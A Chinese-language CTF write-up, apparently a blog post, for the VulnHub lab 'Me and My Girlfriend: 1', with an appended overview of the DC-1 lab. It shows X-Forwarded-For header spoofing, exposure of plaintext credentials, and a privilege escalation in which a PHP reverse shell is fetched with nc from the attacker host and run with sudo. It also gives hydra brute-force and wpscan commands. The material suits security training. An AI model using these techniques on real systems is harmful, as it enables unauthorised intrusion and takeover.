vulnhub靶机练习-Me and My Girlfriend: 1

vulnhub靶机练习-Me and My Girlfriend: 1

靶机下载地址:https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/点击直接下载

  1. 靶机介绍
    DescriptionBack To The Top
    Description: This VM tells us that there are a couple of lovers namely Alice and Bob, where the couple was originally very romantic, but since Alice worked at a private company, “Ceban Corp”, something has changed from Alice’s attitude towards Bob like something is “hidden”, And Bob asks for your help to get what Alice is hiding and get full access to the company!
    Difficulty Level: Beginner
    Notes: there are 2 flag files
    Learning: Web Application | Simple Privilege Escalation
    谷歌翻译
  2. 靶机安装
    虚拟机:vmware workstation 15 pro(官网使用Virtualbox)
    攻击者:kali linux(ip:192.168.15.131)
    文件:Me-and-My-Girlfriend-1.ova
    步骤:vmware workstation点击打开虚拟机,载入.ova,完成靶机安装。将靶机网络设置成与kali linux相同的模式——nat模式。
  3. 主机发现,kali扫描用网段主机,发现目标主机IP为192.168.15.141。
netdiscover -r 192.168.15.131/24

在这里插入图片描述

  1. 对目标主机进行扫描,22/tcp open ssh、80/tcp open http开放。
nmap -sS -A 192.168.15.141

在这里插入图片描述

  1. 访问80端口,限制本地访问,可构造XXF注入。在这里插入图片描述
  2. burpsuite抓包,加入X-Forwarded-For:127.0.0.1(需一直加入消息头内)。
    在这里插入图片描述

forward(一直加入X-Forwarded-For:127.0.0.1)。
在这里插入图片描述
7. 没发现SQL注入,不是文件包含。注册,登录,在profile界面修改密码那,发现源码有账号密码明文。修改user_id,还有其他五个用户的账号密码,其中出现主人公Alice。账号:alice,密码:4lic3。
在这里插入图片描述在这里插入图片描述
8. 用alice的账号密码在kali linux上ssh登录。

ssh alice@192.168.15.141
  1. 登录成功,但是不是root权限,查看不了sudo权限用户。顺便在alice目录下发现了她的秘密和第一个flag
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
  2. 查看系统信息(此处是绕路弯路了,不过也是个思路 )
uname -a

在这里插入图片描述

  1. 用searchsploit查找相关漏洞,进行提权。
searchsploit ubuntu 14.04
searchsploit linux Kernel 4.4.0

在这里插入图片描述

  1. 目标主机没有编译c的环境,安装gcc需要root权限。所以我配置了一台相同参数系统,进行编译,然后用nc传输编译后的文件到目标主机上,运行,提权失败,原因是目标机不在exploit范围内。接着找了几个,都失败了。还是太菜,去网上看下题解。题解链接

  2. 正确方法。查看本用户能够执行的sudo权限。有php执行权限。

 sudo -l

在这里插入图片描述

  1. 上传kali的webshell。给kali反弹一个shell。
    kali(192.168.15.131):
nc -l -p 4444< /usr/share/webshells/php/php-reverse-shell.php

ssh:

nc -vn 192.168.15.131 4444 > shell
sudo php shell

反弹提权成功。
在这里插入图片描述

  1. root目录用户下找到第二个flag。
    参考资料:
    HTTP 请求头中的 X-Forwarded-For
    Vulnhub-Me and My Girlfriend: 1-Writeup
    新解题步骤1

(注:本人菜鸡,如有错误,欢迎评论指出)

### VulnHub DC-1 靶机 攻略 介绍 #### 下载地址 VulnHub是一个提供各种虚拟机镜像用于安全测试和学习渗透测试技巧的平台。对于DC-1靶机,可以在[VulnHub官网](https://www.vulnhub.com/)搜索并下载该靶机镜像文件。 #### 初始信息收集 在启动DC-1之后,通过网络扫描工具如`nmap`来发现开放端口和服务版本是非常重要的初步操作[^2]。这有助于了解目标系统的潜在弱点所在之处。 ```bash nmap -A <target_ip> ``` #### Web应用漏洞探测 一旦确认存在Web服务运行于特定IP地址之上,则可以采用专门针对WordPress站点的安全评估工具WPScan来进行进一步的信息挖掘工作: ```bash wpscan --url http://<target_ip>/wordpress/ ``` 此命令能够帮助识别可能存在的插件或主题中的已知漏洞,并尝试获取管理员用户名列表等有用情报[^1]。 #### 获取初始访问权限 当已经掌握了某些关于网站后台管理账号线索后(比如默认用户名),可借助Hydra这样的暴力破解程序配合常用密码字典对登录界面发起攻击以期获得合法凭证进入内部环境: ```bash hydra -L /usr/share/wordlists/usernames.txt -P /usr/share/wordlists/passwords.txt ssh://<target_ip> ``` 这里假设SSH服务对外开放并且允许远程登陆;实际过程中还需根据具体情况调整相应参数设置[^3]。 #### 提升权限至root级别 成功创建Meterpreter会话意味着获得了较为深入的目标主机控制权,在此基础上继续探索其他未授权区域直至找到可用于提升当前用户权限的方法。例如,如果遇到弱配置下的Sudoers文件或是设置了简单密码的辅助账户,都可以成为突破口之一[^5]: ```bash sudo -l # 查看是否有无需密码即可执行高权限指令的情况 whoami # 确认当前身份 su admin # 尝试切换到更高权限用户 ``` 以上就是有关如何攻克VulnHub平台上名为DC-1这一挑战性实验项目的概览描述以及部分关键技术要点提示。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值